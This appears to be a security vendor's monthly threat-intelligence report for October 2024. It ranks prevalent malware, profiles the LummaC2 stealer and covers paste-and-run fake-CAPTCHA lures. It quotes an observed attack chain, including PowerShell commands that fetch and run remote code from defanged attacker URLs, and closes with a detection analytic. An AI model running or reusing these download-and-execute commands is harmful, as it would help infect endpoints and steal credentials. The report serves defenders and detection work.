Highlights from October
ChromeLoader remained in 1st on our top 10 most prevalent threat list, for the fifth month running. SocGholish dropped out of 2nd place, where it had been holding steady for the last 3 months, and moved down to 6th in October. Its fake-update kindred spirit, Scarlet Goldfinch, also decreased in activity and dropped from 4th to 8th.
Red Canary saw ongoing widespread use of the paste and run (aka ClickFix) initial access technique last month. The technique—which tricks victims into copying, pasting, and running malicious PowerShell code—is proving to be an extremely effective method for gaining access to endpoints. Initial access techniques generally start to become less effective over time as defenders and organizations become savvy to adversary tricks, but paste and run shows no signs of slowing down. On the contrary, the number of adversaries using it—including reports of APT28—the different payloads delivered, and the vectors used to distribute the lure continue to increase at this time.
LummaC2 jumped into 2nd place thanks to multiple ongoing campaigns delivering LummaC2 as a payload, some of which use the paste and run technique. NetSupport Manager, coming in 3rd, also earned its place on the list this month as a paste and run payload. LummaC2 has been on the top 10 list for the last three months, you can read more about this stealer below.
This month’s top 10 threats
To track pervasiveness over time, we identify the number of unique customer environments in which we observed a given threat and compare it to what we’ve seen in previous months.
Here’s how the numbers shook out for October 2024:
Month's rank | Threat name | Threat description |
---|---|---|
Month's rank: ➡ 1 | Threat name: | Threat description : Malware that modifies victims’ browser settings and redirects user traffic to advertisement websites |
Month's rank: ⬆ 2 | Threat name: LummaC2 | Threat description : Information stealer sold on underground forums and used by a variety of adversaries; may also be used as a loader for additional payloads |
Month's rank: ⬆ 3 | Threat name: | Threat description : Legitimate remote access tool (RAT) that can be used as a trojan by adversaries to remotely control victim endpoints for unauthorized access |
Month's rank: ⬇ 4* | Threat name: Amber Albatross | Threat description : Red Canary's name for a cluster of activity that starts from an adware program and progresses through several stages to a pyInstaller EXE with stealer capabilities |
Month's rank: ⬆ 4* | Threat name: | Threat description : Collection of Python classes to construct/manipulate network protocols |
Month's rank: ⬇ 6 | Threat name: | Threat description : Dropper/downloader that uses compromised WordPress sites to redirect users to adversary infrastructure posing as necessary browser updates to trick users into running malicious code |
Month's rank: ⬆ 7 | Threat name: | Threat description : Open source tool that dumps credentials using various techniques |
Month's rank: ⬇ 8* | Threat name: | Threat description : Activity cluster that uses a distribution scheme similar to SocGholish and uses JScript files to drop NetSupport Manager onto victim systems |
Month's rank: ⬆ 9* | Threat name: | Threat description : Malware family used as part of a botnet. Some variants are worms and frequently spread via infected USB drives |
Month's rank: ⬆ 9* | Threat name: Ippedo | Threat description : USB worm that can include a function to download and execute arbitrary binaries |
Month's rank: ⬆ 9* | Threat name: | Threat description : Malware family associated with ad fraud activity through the distribution of adware applications |
⬆ = trending up from previous month
⬇= trending down from previous month
➡ = no change in rank from previous month
*Denotes a tie
LummaC2 has MaaS appeal
LummaC2, also known as LummaC or Lumma Stealer, is a malware-as-a-service (MaaS) stealer that has been available for purchase on underground forums since at least mid-2022. Subscriptions start at $250 USD per month, all the way up to a one-time payment of $20,000 USD to gain access to Lumma source code. LummaC2 is not the only MaaS stealer in use by a large number of adversaries—others include RedLine, Vidar, Raccoon, and more. The MaaS model is popular because it enables adversaries to do evil with relative ease and low overhead, giving them access to effective malware like LummaC2 with continuous development, customer support, and a range of features.
Similar to other stealers, LummaC2 was initially designed to target cryptocurrency wallets, browser information, and 2FA tokens, but it’s expanded beyond its original scope. It remains in active development, and over time has added features including customizable stealer configurations and a loader capability for delivering additional payloads via EXE, DLL, or PowerShell. Here at Red Canary we’ve seen it grow in popularity over the past year, with it reaching our number 2 spot this past month and primed to surpass its prevalence in November.
Initial access IOCs vary according to the delivery method and loader chosen by the adversary, so early detection telemetry varies from case to case. LummaC2 delivery vehicles have been presented to users in an array of creative ways, including phishing emails, drive-by downloads posing as browser updates, fake CAPTCHAs, and masquerading as fake AI software.
One example behavior chain we saw in October involved a user searching for music being redirected to a malicious fake CAPTCHA page hosted at streamingsplays[.]com
. The fake CAPTCHA used PowerShell’s Invoke-Expression (iex
) function to reach out to iplogger[.]ru
with the following deobfuscated command:
iex (iwr https://iplogger[.]ru/259Ja6 -UseBasicParsing).Content
That command, in turn, attempted to download and execute a payload from contabostorage[.]com
(also uploaded to VirusTotal by third parties):
$webClient = New-Object System.Net.WebClient
$url1 = "https://eu2.contabostorage[.]com/97c9beb737884d93a1899766d9f4e34c:gostired/kfhjr76.zip"
$zipPath1 = "$env:TEMP\pg1.zip"
$webClient.DownloadFile($url1, $zipPath1)
$extractPath1 = "$env:TEMP\file"
Expand-Archive -Path $zipPath1 -DestinationPath $extractPath1
Start-Process -FilePath $env:TEMP\file\Setup.exe
The file pg1.zip
in this example is consistent with LummaC2.
Popular LummaC2 loaders have included Arechclient2/SectopRAT, Emmenhtal, and SmartLoader, among others. More recently, Red Canary and other researchers have observed HijackLoader/IDAT Loader (SHA256:8ce1cde3bd1fa2945af8e03459775a87dba7275c17401ab19e525b3238609f6b
) delivering LummaC2.
Behavioral detection of LummaC2 can vary quite a bit since it requires distributers to use crypters. Multiple detection analytics could catch LummaC2 simply because an adversary configured the crypter in a particular way. Crypters that we’ve observed paired with LummaC2 include PureCrypter and CypherIT. Depending on the delivery method and adversary configurations, LummaC2 may be injected into a hollowed process—we’ve recently observed OpenWith.exe
and more.exe
, among others—or leverage DLL side-loading for execution. The stealer activity occurs within memory with direct exfiltration to C2, however in some cases collected data may be staged in text files like System.txt
prior to ZIP archiving for theft. This means that looking for C2 activity or suspicious .txt
file creation may also help detect LummaC2. It does not maintain persistence on its own, however accompanying loaders or follow-on payloads may create and maintain persistence.
LummaC2 has been used by adversaries to deliver additional payloads such as PrivateLoader and, more recently, Amadey. In one instance we observed, Amadey (SHA256:da63a2d8fffb5fccd40785e59c3e50804456395bba9a1b4b2becbd8988360754
) paired with NetSupport Manager (SHA256:1b63f83f06dbd9125a6983a36e0dbd64026bb4f535e97c5df67c1563d91eff89
) as a follow-on payload.
Threat researchers continue to share LummaC2 IOCs and other information that can be used to detect LummaC2. While LummaC2 has a complex delivery and execution chain, its many moving parts and associated threats give us opportunities to detect it before it successfully downloads and executes. For example, as seen by the fake CAPTCHA we shared above, sometimes lures that lead to LummaC2 use PowerShell to download remote resources. That gives us an early detection opportunity.
Detection opportunity: PowerShell using invoke-expression
to download content
This pseudo detection analytic identifies instances of PowerShell using invoke-expression
to download content from an http
URL. Adversaries attempting to deliver threats like LummaC2 use this function to download remotely hosted scripts and code for further exploitation of an endpoint. Note that legitimate package management and orchestration utilities like Chocolatey may use this function to update themselves.
process == (powershell
)
&&
deobfuscated_command_line_includes (iex
)
||
deobfuscated_command_line_includes (.invoke, invoke-expression
)
&&
deobfuscated_command_line_includes (http
)
&&
command_line_does_not_include == (*
)
Note: *
is a placeholder for strings associated with legitimate use of this function in your environment
ICYMI: Stealers evolve to bypass Google Chrome’s new app-bound encryption
With the release of Google Chrome v127, Google implemented “application-bound encryption” (aka “app-bound encryption” or ABE), a new feature aimed at stopping credential access attacks on Google Chrome cookies. This control relies on an elevated service running on Windows systems that attempts to verify an application is Google Chrome instead of stealer malware. This change has shifted the stealer landscape, forcing malware authors to implement new features to bypass the control and steal cookies. Multiple stealer families have already implemented bypasses to obtain cookies from newer Chromium browsers. These include Stealc, Vidar, LummaC2, Meduza, and more.
On November 13, Keith McCammon and Tony Lambert published a blog post sharing details on how stealers are bypassing app-bound encryption and what to do to help mitigate the impact of these changes.